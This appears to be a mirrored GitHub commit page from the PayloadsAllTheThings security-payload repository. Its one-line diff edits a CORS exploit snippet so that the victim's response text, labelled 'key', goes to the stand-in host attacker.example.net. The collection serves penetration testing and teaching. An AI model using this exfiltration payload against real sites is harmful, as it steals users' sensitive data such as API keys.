mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Some clarification in the exploit code
This commit is contained in:
parent
4537555714
commit
48fcdeb7ca
1 changed files with 1 additions and 1 deletions
|
@ -112,7 +112,7 @@ origin in the request:
|
|||
req.send();
|
||||
|
||||
function reqListener() {
|
||||
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
|
||||
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||
};
|
||||
</script>"></iframe>
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue